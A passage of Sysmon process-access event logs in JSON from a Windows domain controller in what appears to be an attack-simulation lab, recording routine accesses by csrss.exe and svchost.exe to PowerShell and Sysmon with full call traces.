System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+95892f1d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d33ff7(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d33cc8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+957e50dd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94cf485e(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d52d2d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d36392(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d36392(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d36223(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d281a8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d346db(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d342ce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d33ff7(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d33cc8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+957e50dd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d1ab29(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d1a0f9(wow64)","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8379,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.825\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0527-5F25-0000-0010C8D31300}\r\nTargetProcessId: 2744\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.825","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0527-5F25-0000-0010C8D31300}","TargetProcessId":"2744","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8380,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.825\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.825","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8381,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.825\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.825","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8382,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.825\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.825","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8383,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.825\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.825","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
